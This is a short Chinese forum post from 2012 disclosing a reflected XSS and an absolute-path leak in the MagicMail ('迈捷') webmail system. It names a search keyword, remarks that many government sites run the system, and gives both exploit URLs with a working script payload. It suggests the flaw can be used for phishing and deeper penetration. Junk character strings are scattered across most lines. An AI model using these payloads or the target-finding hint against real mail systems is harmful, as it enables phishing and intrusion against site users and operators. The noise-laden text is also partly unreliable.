今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞0 o% i7 |$ B% Q4 E2 O/ m; R% c
$ v0 y: ] s0 v9 `9 S
2 M. K/ A+ O9 ? w5 }: Z1 O0 j包含 一个反射性XSS 以及 绝对路径泄漏7 i% X/ i% f% l$ L) c2 y
看了看 貌似全部是linux的。
6 r, b; A- @$ V+ Q- i/ B
4 P3 t$ y/ L, s$ c- L关键字:迈捷邮件系统 by MagicMail
8 B& r4 K. Y* L. a0 x+ s a% \% s% o# d _
可以看到很多政府网站都用这个邮件系统
) \4 G. @) V/ O9 ?6 B7 B! q9 m* ^3 V( J* Y: a/ B
绝对路径 http://madman.in/index.php?login_type=declare&language=( o6 Q3 c- ~+ K4 Q, h8 W0 ?
t5 O6 X f/ q F
( o6 x1 D0 N: Y! C. w8 I, D* D l+ g! J
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
- g: D0 h+ g, F" E u1 Y' t2 f7 j4 G# r$ V7 U& ?+ x
3 \6 Z$ m( `' h \6 B _2 ^" `( d
" X9 \& F( m* C, y5 |虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等; T! `/ l: c! Y4 G- j
5 b7 e" \/ X3 S/ \9 @7 p E: \$ j
修复方案:看官方补丁吧。
3 x+ j, @2 f8 [; c# O: { |
发表于 2012-11-9 20:38:41
收藏
支持
反对